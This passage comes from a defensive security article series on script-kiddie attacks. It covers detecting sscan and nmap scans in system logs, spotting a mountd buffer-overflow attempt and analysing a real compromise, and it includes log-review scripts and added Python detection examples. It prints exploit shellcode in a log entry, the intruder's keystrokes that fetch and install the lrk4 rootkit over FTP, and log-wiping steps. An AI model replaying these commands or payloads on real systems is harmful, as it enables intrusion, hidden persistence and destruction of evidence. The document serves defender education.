sscan represents the "all purpose" script kiddie scanning tool, and it's probably one of the best ones out there. It quickly probes a network for a variety of vulnerabilities (including cgi-bin). It is easily customizable, allowing you to add probes for new exploits. You just give the tool a network and network mask, and it does the rest for you. However, the user must be root to use it. The output is extremely easy to interpret (hence making it so popular): it gives a concise summary of many vulnerable services. All you have to do is run sscan against a network, grep for the word "VULN" in the output, and then run the "exploit du jour". Below is an example of sscan run against the system mozart (172.17.6.30).

otto #./sscan -o 172.17.6.30
--------------------------<[ * report for host mozart *
<[ tcp port: 80 (http) ]>
<[ tcp port: 23 (telnet) ]>
<[ tcp port: 143 (imap) ]>
<[ tcp port: 110 (pop-3) ]>
<[ tcp port: 111 (sunrpc) ]>
<[ tcp port: 79 (finger) ]>
<[ tcp port: 53 (domain) ]>
<[ tcp port: 25 (smtp) ]>
<[ tcp port: 21 (ftp) ]>
--<[ *OS*: mozart: os detected: redhat linux 5.1
mozart: VULN: linux box vulnerable to named overflow.
-<[ *CGI*: 172.17.6.30: tried to redirect a /cgi-bin/phf request.
-<[ *FINGER*: mozart: root: account exists.
--<[ *VULN*: mozart: sendmail will 'expn' accounts for us
--<[ *VULN*: mozart: linux bind/iquery remote buffer overflow
--<[ *VULN*: mozart: linux mountd remote buffer overflow
---------------------------<[ * scan of mozart completed *

Nmap represents the "raw data" tool set.
It doesn't tell you what vulnerabilities exist; rather, it tells you what ports are open, and you determine the security impact. Nmap has quickly become the port scanner of choice, and with good reason. It takes the best of a variety of port scanners and puts all their functionality into a single tool, including OS detection, various packet assembly options, both UDP and TCP scanning, randomization, etc. However, you need networking skills to use the tool and interpret the data. Below is an example of nmap run against the same system.

otto #nmap -sS -O 172.17.6.30

Starting nmap V. 2.08 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
Interesting ports on mozart (172.17.6.30):
Port    State       Protocol  Service
21      open        tcp        ftp
23      open        tcp        telnet
25      open        tcp        smtp
37      open        tcp        time
53      open        tcp        domain
70      open        tcp        gopher
79      open        tcp        finger
80      open        tcp        http
109     open        tcp        pop-2
110     open        tcp        pop-3
111     open        tcp        sunrpc
143     open        tcp        imap2
513     open        tcp        login
514     open        tcp        shell
635     open        tcp        unknown
2049    open        tcp        nfs

TCP Sequence Prediction: Class=truly random
                         Difficulty=9999999 (Good luck!)
Remote operating system guess: Linux 2.0.35-36

Nmap run completed -- 1 IP address (1 host up) scanned in 2 seconds

By reviewing your logs, you can determine which of these tools was used against you. To do this, you have to understand how the tools work.
First, a default sscan run (no modifications to any config files) shows up in your logs as follows:

/var/log/secure
Apr 14 19:18:56 mozart in.telnetd[11634]: connect from 192.168.11.200
Apr 14 19:18:56 mozart imapd[11635]: connect from 192.168.11.200
Apr 14 19:18:56 mozart in.fingerd[11637]: connect from 192.168.11.200
Apr 14 19:18:56 mozart ipop3d[11638]: connect from 192.168.11.200
Apr 14 19:18:56 mozart in.telnetd[11639]: connect from 192.168.11.200
Apr 14 19:18:56 mozart in.ftpd[11640]: connect from 192.168.11.200
Apr 14 19:19:03 mozart ipop3d[11642]: connect from 192.168.11.200
Apr 14 19:19:03 mozart imapd[11643]: connect from 192.168.11.200
Apr 14 19:19:04 mozart in.fingerd[11646]: connect from 192.168.11.200
Apr 14 19:19:05 mozart in.fingerd[11648]: connect from 192.168.11.200

/var/log/maillog
Apr 14 21:01:58 mozart imapd[11667]: command stream end of file, while reading line user=??? host=[192.168.11.200]
Apr 14 21:01:58 mozart ipop3d[11668]: No such file or directory while reading line user=??? host=[192.168.11.200]
Apr 14 21:02:05 mozart sendmail[11675]: NOQUEUE: [192.168.11.200]: expn root

/var/log/messages
Apr 14 21:03:09 mozart telnetd[11682]: ttloop: peer died: Invalid or incomplete multibyte or wide character
Apr 14 21:03:12 mozart ftpd[11688]: FTP session closed

sscan also scans for cgi-bin vulnerabilities. These probes will not be logged by syslogd; you will find them in the web server's access_log.
I decided to include them anyway for your edification :)

/var/log/httpd/access_log
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/phf HTTP/1.0" 302 192
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/Count.cgi HTTP/1.0" 404 170
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/test-cgi HTTP/1.0" 404 169
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/php.cgi HTTP/1.0" 404 168
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/handler HTTP/1.0" 404 168
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/webgais HTTP/1.0" 404 168
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/websendmail HTTP/1.0" 404 172
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/webdist.cgi HTTP/1.0" 404 172
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/faxsurvey HTTP/1.0" 404 170
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/htmlscript HTTP/1.0" 404 171
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/pfdisplay.cgi HTTP/1.0" 404 174
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/perl.exe HTTP/1.0" 404 169
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/wwwboard.pl HTTP/1.0" 404 172
192.168.11.200 - - [14/Apr/1999:16:44:50 -0500] "GET /cgi-bin/ews/ews/architext_query.pl HTTP/1.0" 404 187
192.168.11.200 - - [14/Apr/1999:16:44:50 -0500] "GET /cgi-bin/jj HTTP/1.0" 404 163

Notice how a complete connection was made for all the ports (SYN, SYN-ACK, ACK) and then torn down. That is because sscan is determining at the application layer what is going on. Not only does sscan want to know if your ftp port is open, but what ftp daemon is running. The same can be said for imap, pop, etc. This can be seen in sniff traces using sniffit, a tool commonly used to sniff passwords.

mozart $ cat 172.17.6.30.21-192.168.11.200.7238
220 mozart.example.net FTP server (Version wu-2.4.2-academ[BETA-17](1) Tue Jun 9 10:43:14 EDT 1998) ready.
As you see above, a complete connection was made to determine the version of wu-ftpd that was running. When you see complete connections in your logs, as shown above, you are most likely being scanned by an exploit tool. These tools make a complete connection to determine what you are running.

Nmap, like most port scanners, does not care what software is behind a port, only whether the port is open. For this, nmap has a powerful set of options, letting you determine what kind of connection to make, including SYN, FIN, Xmas, Null, etc. For a detailed description of these options, check out http://www.insecure.org/nmap/nmap_doc.html. Because of these options, your logs will differ based on the options selected by the remote user. A connection made with the -sT flag is a complete connection, so the logs will look similar to sscan; however, by default nmap scans more ports.

/var/log/secure
Apr 14 21:20:50 mozart in.rlogind[11706]: connect from 192.168.11.200
Apr 14 21:20:51 mozart in.fingerd[11708]: connect from 192.168.11.200
Apr 14 21:20:51 mozart ipop2d[11709]: connect from 192.168.11.200
Apr 14 21:20:51 mozart in.rshd[11710]: connect from 192.168.11.200
Apr 14 21:20:51 mozart gn[11711]: connect from 192.168.11.200
Apr 14 21:20:51 mozart gn[11711]: error: cannot execute /usr/sbin/gn: No such file or directory
Apr 14 21:20:52 mozart in.timed[11712]: connect from 192.168.11.200
Apr 14 21:20:52 mozart imapd[11713]: connect from 192.168.11.200
Apr 14 21:20:52 mozart ipop3d[11714]: connect from 192.168.11.200
Apr 14 21:20:52 mozart in.telnetd[11715]: connect from 192.168.11.200
Apr 14 21:20:52 mozart in.ftpd[11716]: connect from 192.168.11.200

One thing to keep in mind is the -D (decoy) option. This nmap option lets the user mix the real probes with probes carrying spoofed source addresses. You may see scans from 15 different sources at the same time, but only one of them is the real one. It is extremely difficult to determine which of the 15 was the actual source.
More often, users will select the -sS flag for port scanning. This is a stealthier option, as only a SYN packet is sent. If the remote system responds, the half-open connection is immediately torn down with a RST. The logs from such a scan look as follows (NOTE: only the first five entries are included here).

/var/log/secure
Apr 14 21:25:08 mozart in.rshd[11717]: warning: can't get client address: Connection reset by peer
Apr 14 21:25:08 mozart in.rshd[11717]: connect from unknown
Apr 14 21:25:09 mozart in.timed[11718]: warning: can't get client address: Connection reset by peer
Apr 14 21:25:09 mozart in.timed[11718]: connect from unknown
Apr 14 21:25:09 mozart imapd[11719]: warning: can't get client address: Connection reset by peer
Apr 14 21:25:09 mozart imapd[11719]: connect from unknown
Apr 14 21:25:09 mozart ipop3d[11720]: warning: can't get client address: Connection reset by peer
Apr 14 21:25:09 mozart ipop3d[11720]: connect from unknown
Apr 14 21:25:09 mozart in.rlogind[11722]: warning: can't get client address: Connection reset by peer
Apr 14 21:25:09 mozart in.rlogind[11722]: connect from unknown

Notice all the errors in the connections. Since the handshake is torn down before a complete connection is made, the daemon cannot determine the source system. The logs show that you have been scanned; unfortunately you do not know by whom. What is even more alarming is, on most other systems (including newer kernels of Linux), none of these errors would have been logged. To quote Fyodor: "... based on all the 'connection reset by peer' messages. This is a Linux 2.0.XX oddity -- virtually every other system (including the 2.2 and later 2.1 kernels) will show nothing. That bug (accept() returning before completion of the 3-way handshake) was fixed."

Nmap includes other stealth options, such as -sF, -sX and -sN, where various TCP flags are used. This is what the logs look like for these scans:

/var/log/secure

Notice something here: no logs!
Scary huh, you just got scanned and didn't even know it. All three types of scans determined the same results; however, you are able to fully log only the first type, -sT (full connection). To detect these stealth scans, you will need to use a different logging application such as tcplogd, scanlogd, or ippl. Some commercial firewalls will also detect and log all of these scans (I have confirmed this on Checkpoint Firewall 1).

Did They Gain Access?

Once you have determined that you were scanned, and what they were looking for, the next big question is "Did they get in?". Most of today's remote exploits are based on buffer overflows (otherwise known as smashing the stack). Simply stated, a buffer overflow is when a program (usually a daemon) receives more input than it expected, thus overwriting critical areas in memory. Code supplied by the attacker is then executed, usually giving the user root access. For more info on buffer overflows, check Aleph1's excellent paper at ftp://ftp.technotronic.com/rfc/phrack49-14.txt. You can normally identify buffer overflow attacks in the /var/log/messages log file (or /var/adm/messages for other flavors of Unix) for attacks such as mountd. You will also see similar logs in maillog for such attacks against imapd. A buffer overflow attack would look like this.

Apr 14 04:20:51 mozart mountd[6688]: Unauthorized access by NFS client 192.168.11.200.
Apr 14 04:20:51 mozart syslogd: Cannot glue message parts together Apr 14 04:20:51 mozart mountd[6688]: Blocked attempt of 192.168.11.200 to mount ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P3Û3À°^[Í~@3Ò3À~KÚ°^FÍ~@þÂuô1À°^BÍ~@~EÀubëb^V¬<ýt^FþÀt^Këõ°0þÈ~HFÿëì^°^B~ I^FþÈ~IF^D°^F~IF^H°f1ÛþÃ~IñÍ~@~I^F°^Bf~IF^L°*f~IF^N~MF^L~IF^D1À~IF^P°^P~IF^H° fþÃÍ~@°^A~IF^D°f³^DÍ~@ë^DëLëR1À~IF^D~IF^H°fþÃÍ~@~Hð?1ÉÍ~@°?þÁÍ~@°?þÁÍ~@¸.bin@~ I^F¸.sh!@~IF^D1À~HF^G~Iv^H~IF^L°^K~Ió~MN^H~MV^LÍ~@1À°^A1ÛÍ~@èEÿÿÿÿýÿPrivet ADMcrew~P(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(Apr 14 04:20:51 mozart ^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^ E^H(-^E^H-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E ^H(-^E^H-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^ H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E ^H(-^E^H(-^E When you see something like 
this in your log files, someone has attempted to exploit your system. It is difficult to determine if the exploit was successful. One way to do this is, following the exploit attempt, to see if there are any connections from the remote source to your system. If they successfully log in from the remote system, they have access. Another clue is if you find the accounts "moof", "rewt", "crak0", or "w0rm" added to your /etc/passwd file. These accounts, uid 0, are added by some of the more common exploit scripts. Once a blackhat gains access, normally the first thing they do is wipe your logs clean and trojan your logging (syslogd); for more information, see Know Your Enemy: III. From this point on, you will not receive any logs from your system as everything has been compromised. What you do next is the subject for another article :). Until then, I recommend you check out http://www.cert.org/nav/recovering.html

To help me find anomalies in my log files, I whipped up a shell script that scans my logs for me. For more detailed information on grepping and sorting log files, check out this posting by Marcus Ranum.

Bourne shell script

#!/bin/bash
#
# Created 20 April, 1999
# Lance Spitzner, lance@spitzner.net
#
# Shows last 10 entries of critical system logs.
# Build in some "artificial intelligence" using
# greps and sorts.  You can select a specific
# host's logs, or you can select all hosts' logs.
#
# Add whatever grep/sort statements you want to the
# functions below.  The ones included are just
# examples.

##### Build variables
# An empty pattern matches every line, i.e. all hosts.
if [ "$1" = "all" ]; then
  system=""
else
  system=$1
fi
log=$2

##### Functions
secure () {
  echo -e "\n\t--- Last 10 entries in /var/log/secure ---\n"
  # drop connections from the author's own 172.16.1.x network
  grep "$system" /var/log/secure | grep -v "172.16.1." | tail -10
}

messages () {
  echo -e "\n\t--- Last 10 entries in /var/log/messages ---\n"
  # named chatter and syslog -- MARK -- lines are noise here
  grep "$system" /var/log/messages | grep -E -v '(named|MARK)' | tail -10
}

maillog () {
  echo -e "\n\t--- Last 10 entries in /var/log/maillog ---\n"
  grep "$system" /var/log/maillog | tail -10
}

title () {
  if [ "$system" = "" ]; then
    echo -e "\n### These are the log results of all systems ###"
  else
    echo -e "\n### These are the log results of system $system ###"
  fi
}

##### Actual program
case "$log" in
  secure)
    title
    secure
    ;;
  messages)
    title
    messages
    ;;
  maillog)
    title
    maillog
    ;;
  all)
    title
    secure
    messages
    maillog
    ;;
  *)
    echo -e "\nUsage: `basename $0` <system> <log>"
    echo
    echo "  <system>"
    echo "    Can either be a single source you want to grep"
    echo "    for in the log, or type \"all\" for all hosts in the"
    echo "    log file."
    echo
    echo "  <log>"
    echo "    secure   -> for /var/log/secure"
    echo "    messages -> for /var/log/messages"
    echo "    maillog  -> for /var/log/maillog"
    echo -e "\tall      -> for all three log files\n"
    ;;
esac
exit 0

-=-

Korn shell script

#!/bin/ksh
#
# Created 20 April, 1999
# Lance Spitzner, lance@spitzner.net
#
# Shows last 10 entries of critical system logs.
# Build in some "artificial intelligence" using
# greps and sorts.  You can select a specific
# host's logs, or you can select all hosts' logs.
#

##### Define input
# ":" appears in every syslog timestamp, so it matches all hosts.
if [ "$1" = "all" ]; then
  system=":"
else
  system=$1
fi
log=$2

##### Define logs
inetdlog=/var/adm/inetdlog
messages=/var/adm/messages
syslog=/var/adm/syslog

##### Functions
inetdlog () {
  echo "\n\t--- Last 10 entries in $inetdlog ---\n"
  # drop connections from the author's own 172.16.1.x network
  grep "$system" "$inetdlog" | grep -v "172.16.1." | tail -10
}

messages () {
  echo "\n\t--- Last 10 entries in $messages ---\n"
  # named chatter and syslog -- MARK -- lines are noise here
  grep "$system" "$messages" | egrep -v '(named|MARK)' | tail -10
}

syslog () {
  echo "\n\t--- Last 10 entries in $syslog ---\n"
  grep "$system" "$syslog" | tail -10
}

title () {
  if [ "$system" = ":" ]; then
    echo "\n### These are the log results of all systems ###"
  else
    echo "\n### These are the log results of system $system ###"
  fi
}

##### Actual program
case "$log" in
  inetdlog)
    title
    inetdlog
    ;;
  messages)
    title
    messages
    ;;
  syslog)
    title
    syslog
    ;;
  all)
    title
    inetdlog
    messages
    syslog
    ;;
  *)
    echo "\nUsage: `basename $0` <system> <log>"
    echo
    echo "\t<system>"
    echo "\tCan either be a single source you want to grep"
    echo "\tfor in the log, or type \"all\" for all hosts in the"
    echo "\tlog file."
    echo
    echo "\t<log>"
    echo "\tinetdlog -> for $inetdlog"
    echo "\tmessages -> for $messages"
    echo "\tsyslog   -> for $syslog"
    echo "\tall      -> for all three log files\n"
    ;;
esac
exit 0

Conclusion

Your system logs can tell you a great deal about the enemy. However, the first step is guaranteeing the integrity of your log files. One of the best ways to do that is to use a remote log server that receives and stores logs from all systems. Once secured, you can then identify patterns in your log files. Based on these patterns and log entries, you can determine what the blackhat is looking for, and potentially what tools they are using. Based on this knowledge, you can better secure and protect your systems.

Author's bio

Lance Spitzner enjoys learning by blowing up his Unix systems at home. Before this, he was an Officer in the Rapid Deployment Force, where he blew up things of a different nature. You can reach him at lance@spitzner.net.

Part 3 They Gain Root

Know Your Enemy: III
Lance Spitzner
Last Modified: 23 May, 1999

This article is the third of a series focusing on the script kiddie. The first paper focuses on how script kiddies probe for, identify, and exploit vulnerabilities.
The second paper focuses on how you can detect these attempts, identify what tools they are using and what vulnerabilities they are looking for. This paper, the third, focuses on what happens once they gain root; specifically, how they cover their tracks and what they do next.

Who is the script kiddie

As we learned in the first paper, the script kiddie is not so much a person as it is a strategy: the strategy of probing for the easy kill. One is not searching for specific information or targeting a specific company; the goal is to gain root the easiest way possible. Intruders do this by focusing on a small number of exploits, and then searching the entire Internet for that exploit. Do not underestimate this strategy; sooner or later they find someone vulnerable. Once they find a vulnerable system and gain root, their first step is normally to cover their tracks. They want to ensure you do not know your system was hacked and cannot see nor log their actions. Following this, they often use your system to scan other networks, or silently monitor your own. To gain a better understanding of how they accomplish these acts, we are going to follow the steps of a system compromised by an intruder using script kiddie tactics. Our system, called mozart, is a Linux box running Red Hat 5.1. The system was compromised on April 27, 1999. Below are the actual steps our intruder took, with system logs and keystrokes to verify each step. All system logs were recorded to a protected syslog server; all keystrokes were captured using sniffit. Throughout this paper our intruder is referred to as he; however, we have no idea what the true gender of the intruder is.

The exploit

On 27 April, at 00:13 hours, our network was scanned by the system 1Cust174.tnt2.long-branch.nj.da.uu.net for several vulnerabilities, including imap.
Our intruder came in noisy, as every system in the network was probed (for more information on detecting and analyzing scans, please see the second paper of this series).

Apr 27 00:12:25 mozart imapd[939]: connect from 208.252.226.174
Apr 27 00:12:27 bach imapd[1190]: connect from 208.252.226.174
Apr 27 00:12:30 vivaldi imapd[1225]: connect from 208.252.226.174

Apparently he found something he liked and returned at 06:52 and 16:47 the same day. He started off with a more thorough scan, but this time focusing only on mozart. He identified a weakness and launched a successful attack against mountd, a commonly known vulnerability for Red Hat 5.1. Here we see in /var/log/messages the intruder gaining root. The tool used was most likely ADMmountd.c, or something similar to it.

Apr 27 16:47:28 mozart mountd[306]: Unauthorized access by NFS client 208.252.226.174.
Apr 27 16:47:28 mozart syslogd: Cannot glue message parts together
Apr 27 16:47:28 mozart mountd[306]: Blocked attempt of 208.252.226.174 to mount ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~

Immediately following this exploit, we see in /var/log/messages our intruder gaining root by telnetting in as the user crak0 and then su'ing to the user rewt. Both of these accounts were added by the exploit script. Our intruder now has total control of our system.

Apr 27 16:50:27 mozart login[1233]: FAILED LOGIN 2 FROM 1Cust102.tnt1.long-branch.nj.da.uu.net FOR crak, User not known to the underlying authentication module
Apr 27 16:50:38 mozart PAM_pwdb[1233]: (login) session opened for user crak0 by (uid=0)
Apr 27 16:50:38 mozart login[1233]: LOGIN ON ttyp0 BY crak0 FROM 1Cust102.tnt1.long-branch.nj.da.uu.net
Apr 27 16:50:47 mozart PAM_pwdb[1247]: (su) session opened for user rewt by crak0(uid=0)

Covering their tracks

The intruder is now on our system as root. As we are about to see, the next step for him is to make sure he does not get caught.
First, he checks to see if anyone else is on the system.

[crak0@mozart /tmp]$ w
  4:48pm  up 1 day, 18:27,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
crak0    ttyp0    1Cust102.tnt1.lo  4:48pm  0.00s  0.23s  0.04s  w

After making sure the coast is clear, he will want to hide all of his actions. This normally entails removing any evidence from the log files and replacing system binaries with trojans, such as ps or netstat, so you cannot see the intruder on your own system. Once the trojans are in place, the intruder has gained total control of your system and you will most likely never know it. Just as there are automated scripts for hacking, there are also automated tools for hiding intruders, often called rootkits. One of the more common rootkits is lrk4. By executing the script, a variety of critical files are replaced, hiding the intruder in seconds. For more detailed information on rootkits, see the README that comes with lrk4. This will give you a better idea how rootkits work in general. Within minutes of compromising our system, we see the intruder downloading the rootkit and then implementing the script with the command "make install". Below are the actual keystrokes the intruder typed to hide himself.

cd /dev/
su rewt
mkdir ". "
cd ". "
ftp technotronic.com
anonymous
fdfsfdsdfssd@aol.com
cd /unix/trojans
get lrk4.unshad.tar.gz
quit
ls
tar -zxvf lrk4.unshad.tar.gz
mv lrk4 proc
mv proc ". "
cd ". "
ls
make install

Notice the first thing our intruder did: he created the hidden directory ". " to hide his toolkit. This directory does not show up with the "ls" command, and looks like the local directory with the "ls -la" command. One way you can locate the directory is with the "find" command (be sure you can trust the integrity of your "find" binary).

mozart #find / -depth -name "*.*"
/var/lib/news/.news.daily
/var/spool/at/.SEQ
/dev/. /. /procps-1.01/proc/.depend
/dev/. /. 
/dev/. 
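The find command above works because ". " happens to contain a dot, but it also lists every ordinary dotfile on the box. The following is an added example, not code from Spitzner's paper, that generalises the check to the whole family of names built to look like "." or ".." in an ls -la listing: dots padded with whitespace, or nothing but dots and spaces. The sample tree it builds (a /dev/". "/". "/procps-1.01/proc nest like the intruder's, beside legitimate dotfiles) is constructed. The paper's caveat about trusting the find binary applies equally here: the script reads directory entries through the kernel, so a kernel-level rootkit could still hide from it.

```python
"""Locate directories whose names are disguised to hide from ls.
Added example for the ". " trick in the "Know Your Enemy" write-up; not the
paper's code. The fixture tree is constructed."""
import os
import tempfile


def is_disguised_name(name):
    """True for names that imitate the '.' and '..' entries or hide behind
    whitespace: ". ", " ..", "...", "   ". Ordinary dotfiles (".ssh",
    ".news.daily") are not flagged, which is what keeps the report short."""
    stripped = name.strip()
    if stripped in (".", ".."):
        return name != stripped        # the real entries are fine; padded copies are not
    if stripped == "" or set(stripped) <= {"."}:
        return True                    # all whitespace, or only dots
    return name != stripped            # any leading or trailing whitespace


def find_disguised_dirs(root):
    """Walk root (symlinks not followed) and return root-relative paths of
    directories with disguised names, deepest first like `find -depth`."""
    hits = []
    for dirpath, dirnames, _files in os.walk(root):
        for d in dirnames:
            if is_disguised_name(d):
                hits.append(os.path.relpath(os.path.join(dirpath, d), root))
    return sorted(hits, key=lambda p: (-p.count(os.sep), p))


def build_sample_tree():
    """Constructed fixture mirroring the paper: the toolkit lives under
    /dev/". "/". "/procps-1.01/proc; the other dot entries are legitimate."""
    root = tempfile.mkdtemp(prefix="hidden_")
    os.makedirs(os.path.join(root, "dev", ". ", ". ", "procps-1.01", "proc"))
    os.makedirs(os.path.join(root, "var", "lib", "news"))
    os.makedirs(os.path.join(root, "home", "user", ".ssh"))
    open(os.path.join(root, "var", "lib", "news", ".news.daily"), "w").close()
    return root


if __name__ == "__main__":
    for hit in find_disguised_dirs(build_sample_tree()):
        print(repr(hit))               # repr() makes the trailing space visible
```

Printing with repr() matters in practice: a bare print of "dev/. " looks exactly like "dev/." and the trailing space that makes the directory special is invisible, which is the same trick that fooled ls -la in the first place.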
Our intruder may have been somewhat sophisticated in using trojan binaries, but had a simpler approach to cleaning the log files. Instead of using cleaning tools such as zap2 or clean, he copied /dev/null to the files /var/run/utmp and /var/log/utmp, while deleting /var/log/wtmp. You know something is wrong when these log files contain no data, or you get the following error:

[root@mozart sbin]# last -10
last: /var/log/wtmp: No such file or directory
Perhaps this file was removed by the operator to prevent logging last info.

The next step

Once a system has been compromised, intruders tend to do one of two things. First, they use your system as a launching pad and scan or exploit other systems. Second, they decide to lay low and see what they can learn about your system, such as accounts for other systems. Our intruder decided for option number two, lay low and see what he could learn. He implemented a sniffer on our system that would capture all of our network traffic, including telnet and ftp sessions to other systems. This way he could learn logins and passwords. We see the system going into promiscuous mode in /var/log/messages soon after the compromise.

Apr 27 17:03:38 mozart kernel: eth0: Setting promiscuous mode.
Apr 27 17:03:43 mozart kernel: eth0: Setting promiscuous mode.

After implementing the trojan binaries, clearing the log files, and starting the sniffer, our intruder disconnected from the system. However, we will see him returning the next day to find what traffic he captured.

Damage Control

Since our friend had disconnected, this gave me a chance to review the system and see what exactly happened. I was extremely interested to see what was altered, and where he was logging the sniffer information. First, I quickly identified with Tripwire which files were modified.
Tripwire showed the following:

added:   -rw-r--r-- root         5 Apr 27 17:01:16 1999 /usr/sbin/sniff.pid
added:   -rw-r--r-- root       272 Apr 27 17:18:09 1999 /usr/sbin/tcp.log
changed: -rws--x--x root     15588 Jun  1 05:49:22 1998 /bin/login
changed: drwxr-xr-x root     20480 Apr 10 14:44:37 1999 /usr/bin
changed: -rwxr-xr-x root     52984 Jun 10 04:49:22 1998 /usr/bin/find
changed: -r-sr-sr-x root    126600 Apr 27 11:29:18 1998 /usr/bin/passwd
changed: -r-xr-xr-x root     47604 Jun  3 16:31:57 1998 /usr/bin/top
changed: -r-xr-xr-x root      9712 May  1 01:04:46 1998 /usr/bin/killall
changed: -rws--s--x root    116352 Jun  1 20:25:47 1998 /usr/bin/chfn
changed: -rws--s--x root    115828 Jun  1 20:25:47 1998 /usr/bin/chsh
changed: drwxr-xr-x root      4096 Apr 27 17:01:16 1999 /usr/sbin
changed: -rwxr-xr-x root    137820 Jun  5 09:35:06 1998 /usr/sbin/inetd
changed: -rwxr-xr-x root      7229 Nov 26 00:02:19 1998 /usr/sbin/rpc.nfsd
changed: -rwxr-xr-x root    170460 Apr 24 00:02:19 1998 /usr/sbin/in.rshd
changed: -rwxr-x--- root    235516 Apr  4 22:11:56 1999 /usr/sbin/syslogd
changed: -rwxr-xr-x root     14140 Jun 30 14:56:36 1998 /usr/sbin/tcpd
changed: drwxr-xr-x root      2048 Apr  4 16:52:55 1999 /sbin
changed: -rwxr-xr-x root     19840 Jul  9 17:56:10 1998 /sbin/ifconfig
changed: -rw-r--r-- root       649 Apr 27 16:59:54 1999 /etc/passwd

As you can see, a variety of binaries and files were modified. There were no new entries in /etc/passwd (wisely, he had removed the crak0 and rewt accounts), so our intruder must have left a backdoor in one of the modified binaries. Also, two files were added, /usr/sbin/sniff.pid and /usr/sbin/tcp.log. Not surprisingly, /usr/sbin/sniff.pid was the pid of the sniffer, /usr/sbin/tcp.log was where he was storing all of his captured information. Based on /usr/sbin/sniff.pid, the sniffer turned out to be rpc.nfsd. Our intruder had compiled a sniffer, in this case linsniffer, and replaced rpc.nfsd with it. This ensured that if the system was rebooted, the sniffer would be restarted by the init process.
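The Tripwire report above only has value because a baseline was taken before the break-in. The following is an added example, not Tripwire and not code from Spitzner's paper, that shows the same workflow end to end: hash a tree into a baseline, re-hash after the fact and report added, changed and removed files; then run a minimal strings-style scan over the added and changed files for the sniffer phrases quoted in the paper (SOCK_PACKET, promiscuous, sniff.pid, tcp.log); and finally report login-accounting files that are empty or missing, the symptom of the cp /dev/null cleanup described under "Covering their tracks". The tree, the file contents and the baseline layout (path to SHA-256) are constructed.

```python
"""Integrity baseline compare, strings-style triage and utmp/wtmp check.
Added example for the "Damage Control" section of the "Know Your Enemy"
write-up; not Tripwire, not the paper's code. Fixture data is constructed."""
import hashlib
import os
import re
import tempfile
from pathlib import Path

# Phrases the paper's `strings /usr/sbin/rpc.nfsd` output actually contained.
SNIFFER_MARKERS = ("SOCK_PACKET", "promiscuous", "sniff.pid", "tcp.log")


def file_digest(path):
    """SHA-256 of a file, read in chunks so large binaries are fine."""
    h = hashlib.sha256()
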